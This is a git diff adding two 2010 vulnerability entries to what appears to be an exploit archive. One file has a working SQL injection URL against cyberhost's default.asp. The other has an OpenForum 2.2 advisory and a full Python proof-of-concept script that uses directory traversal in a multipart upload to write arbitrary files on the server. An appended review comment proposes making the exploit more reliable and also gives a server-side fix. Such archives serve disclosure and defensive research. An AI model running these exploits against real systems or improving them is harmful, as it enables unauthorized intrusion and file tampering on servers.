diff --git a/files.csv b/files.csv
index 09c35de12..fbbc9ad3d 100755
--- a/files.csv
+++ b/files.csv
@@ -30651,3 +30651,5 @@ id,file,description,date,author,platform,type,port
 34031,platforms/php/webapps/34031.txt,"gpEasy CMS 1.6.2 'editing_files.php' Cross Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0
 34032,platforms/php/webapps/34032.txt,"NPDS Revolution 10.02 'admin.php' Cross-Site Request Forgery Vulnerability",2010-05-20,"High-Tech Bridge SA",php,webapps,0
 34033,platforms/hardware/remote/34033.html,"Cisco DPC2100 2.0.2 r1256-060303 Multiple Security Bypass and Cross-Site Request Forgery Vulnerabilities",2010-05-24,"Dan Rosenberg",hardware,remote,0
+34034,platforms/asp/webapps/34034.txt,"cyberhost 'default.asp' SQL Injection Vulnerability",2010-05-22,redst0rm,asp,webapps,0
+34035,platforms/php/webapps/34035.sjs,"OpenForum 2.2 b005 'saveAsAttachment()' Method Arbitrary File Creation Vulnerability",2010-05-23,"John Leitch",php,webapps,0
diff --git a/platforms/asp/webapps/34034.txt b/platforms/asp/webapps/34034.txt
new file mode 100755
index 000000000..118f5c718
--- /dev/null
+++ b/platforms/asp/webapps/34034.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/40357/info
+
+cyberhost is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/default.asp?gb=paketayrinti&id=18+union+select+0,1,2,3,4,5,6,7+from+uye
\ No newline at end of file
diff --git a/platforms/php/webapps/34035.sjs b/platforms/php/webapps/34035.sjs
new file mode 100755
index 000000000..abf44c58c
--- /dev/null
+++ b/platforms/php/webapps/34035.sjs
@@ -0,0 +1,92 @@
+source: http://www.securityfocus.com/bid/40364/info
+
+OpenForum is prone to a vulnerability that may allow remote attackers to create arbitrary files on a vulnerable system.
+
+Successful exploits will allow an attacker to create arbitrary files, which may then be executed to perform unauthorized actions. This may aid in further attacks.
+
+OpenForum 2.2 b005 is vulnerable; other versions may also be affected.
+
+#============================================================================================================#
+# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #
+# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #
+# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #
+# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #
+# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #
+# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #
+# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #
+# #
+#============================================================================================================#
+# #
+# Vulnerability............Arbitrary File Write #
+# Software.................Open Forum Server 2.2 b005 #
+# Download.................http://code.google.com/p/open-forum #
+# Date.....................5/23/10 #
+# #
+#============================================================================================================#
+# #
+# Site.....................http://cross-site-scripting.blogspot.com/ #
+# Email....................john.leitch5@gmail.com #
+# #
+#============================================================================================================#
+# #
+# ##Description## #
+# #
+# An arbitrary file write vulnerability in the saveAsAttachment method
of Open Forum Server 2.2 b005 can be # +# exploited to write to the local file system of the server. # +# # +# # +# ##Exploit## # +# # +# Upload a get.sjs file that calls the vulnerable method. Request the script's containing folder. # +# # +# # +# ##Proof of Concept## # +# # +import sys, socket +host = 'localhost' +port = 80 + +def send_request(request): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(32) # sometimes it takes a while + s.connect((host, port)) + s.send(request) + + response = s.recv(8192) + s.recv(8192) # a hack within a hack + + return response + +def write_file(): + try: + content = '----x--\r\n'\ + 'Content-Disposition: form-data; name="file"; filename="get.sjs"\r\n'\ + 'Content-Type: application/octet-stream\r\n\r\n'\ + 'fileName = "' + '..\\\\' * 256 + 'x.txt";\r\n'\ + 'data = "hello, world";\r\n'\ + 'user = transaction.getUser();\r\n'\ + 'wiki.saveAsAttachment("x",fileName,data,user);\r\n'\ + 'transaction.sendPage("File Written");\r\n\r\n'\ + '----x----\r\n' + + response = send_request('POST OpenForum/Actions/Attach?page=OpenForum HTTP/1.1\r\n' + 'Host: ' + host + '\r\n' + 'Content-Type: multipart/form-data; boundary=--x--\r\n' + 'Content-Length: ' + str(len(content)) + '\r\n\r\n' + content) + + if 'HTTP/1.1 302 Redirect' not in response: + print 'Error writing get.sjs' + return + else: print 'get.sjs created' + + response = send_request('GET OpenForum HTTP/1.1\r\n' + 'Host: ' + host + '\r\n\r\n') + + if 'File Written' not in response: + print 'Error writing to root' + return + else: print 'x.txt created in root' + + except Exception: + print sys.exc_info() + +write_file()
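Review bot: `send_request` opens a socket that is never closed, and it sends with `s.send(request)` without checking the return value, so a partial write leaves the later `'HTTP/1.1 302 Redirect'` check reading an unrelated response; release the socket on every path and send the whole buffer, `try: ... finally: s.close()` around the exchange and `s.sendall(request)` in place of `s.send(request)`. The hunk's own comment calls the second discarded `recv(8192)` "a hack within a hack", so both the `302` and the `'File Written'` substring checks rely on server framing and timing rather than on a parsed response, which is worth stating in a comment on `send_request`. The file lands as `.sjs` while its content is Python 2 only (print statements, str-typed socket writes); a one-line header such as `# Python 2 PoC; needs porting for Python 3` would save the next reader a failed run. On the defensive side, the advisory text in this hunk attributes the issue to an unvalidated `fileName` reaching `saveAsAttachment`, so the server-side fix is to canonicalize the attachment name and reject any path that resolves outside the attachment directory.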